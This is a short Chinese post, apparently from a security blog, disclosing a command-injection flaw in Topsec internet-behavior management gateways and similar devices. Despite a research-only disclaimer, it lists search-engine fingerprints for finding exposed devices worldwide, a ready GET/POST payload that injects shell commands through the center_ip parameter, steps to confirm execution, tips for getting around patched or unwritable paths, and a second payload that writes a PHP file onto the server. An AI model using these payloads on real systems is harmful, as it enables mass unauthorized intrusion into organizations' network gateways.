亲爱的读者,我们诚挚地提醒您,本技术文章仅供个人研究学习参考。任何因传播或利用本文章提供的信息而造成的直接或间接后果及损失,均由使用者自行承担责任。作者对此概不负责。如有侵权,请立即告知,我们将立即删除并致歉。感谢您的理解与支持!
该通杀漏洞来自于天融信上网行为管理系统发现
漏洞存在于:center_ip参数
各类上网行为网关,上网行为管理系统,上网行为审计等......
国内-国外均有
影响众多设备,就不全部截图了,自寻测绘引擎查找
title==" Technology, Inc."
body="dkey_activex_download.php"
title=="Login @ Reporter"
还有众多不同语法,自寻研究
Payload:
/view/systemConfig/management/nmc_sync.php?center_ip=1;whoami%20%3E%201.txt;&template_path=1
可GET可POST请求
执行Payload过后弹窗提示OK就成功代码执行了
写入的文件地址:
/view/systemConfig/management/1.txt
访问写入的文件,发现执行的whoami命令成功回显并输出到1.txt内容中。
如果发现执行poc过后访问写入的文件为404,那么说明此URL漏洞已修复或目录没有写入权限,请尝试修改写入的路径或者寻找其他URL进行测试。
也可尝试利用总结中的poc进行测试
后台回复'多设备通杀RCE'获取python利用脚本
23年就发布此通杀到朋友圈,一直有人说我拿着:
/view/Behavior/toQuery.php?method=getList&objClass=%0aecho%20%27%3C?php%20phpinfo();?%3E%27%3E/var/www/reporter/5.php%0a
此poc招摇撞骗。
请睁大你的眼睛看清楚漏洞点位以及存在漏洞的文件
截止2024年1月11日,还有众多URL均可复现。
关于此类通杀漏洞挖掘Tips:
多尝试寻找不同厂商的相同类型的设备进行挖掘
希望师傅们天天得0day,也祝各位师傅们2024暴富!